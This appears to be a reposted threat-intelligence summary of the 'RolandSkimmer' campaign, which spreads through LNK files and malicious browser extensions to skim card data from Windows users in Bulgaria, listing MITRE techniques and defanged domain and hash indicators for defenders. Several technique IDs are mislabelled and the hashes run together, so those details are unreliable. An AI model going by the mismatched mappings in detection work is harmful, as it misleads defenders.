The “RolandSkimmer” campaign utilizes malicious browser extensions and LNK files to execute persistent credit card skimming attacks, primarily targeting users in Bulgaria. The malware collects sensitive data through deceptive mechanisms while maintaining stealth and adaptation to its victims’ environments. Affected: Microsoft Windows, Chrome, Edge, Firefox
Keypoints :
- The “RolandSkimmer” campaign targets Microsoft Windows users through malicious LNK files and browser extensions.
- Malware is spread via a deceptive ZIP file that executes obfuscated scripts when a shortcut file is opened.
- It conducts system reconnaissance to gather information about the victim’s environment.
- Additional malicious files for various browsers are downloaded to perform data harvesting.
- The campaign employs tactics to achieve stealth, persistence, and data exfiltration.
- Credit card information is targeted during form submission interception without detection.
- FortiGuard Labs provides detection solutions to block these threats efficiently.
MITRE Techniques :
- T1203 – Exploit Public-Facing Application: The attacker exploits users via malicious LNK files.
- T1071 – Application Layer Protocol: The malware communicates with its command and control (C2) server over HTTP/S to relay captured data.
- T1480 – Execution through API: Uses vbscript with mshta.exe to execute commands remotely.
- T1041 – Exfiltration Over Command and Control Channel: Captured credit card data is sent to the C2 server.
- T1070 – Indicator Removal on Host: The attacker does not alter legitimate browser binaries to avoid detection.
Indicator of Compromise :
- [Domain] invsetmx[.]com
- [Domain] fzhivka-001-site1[.]btempurl[.]com
- [Domain] exmkleo[.]com
- [Domain] bg3dsec[.]com
- [SHA256] 80e0aa05ffd973decf9b7f435c5a44574e4c8314c152c7a09e00c821828fe515e30eecb53e4b03cfada8791877c3c67e009d25bb4d57f01f9eb7cd1121ac1908e0898e5d1f71bb0311ddfdef9697f684da6da701ad36ab8107dcb5d5e438838838d
Views: 20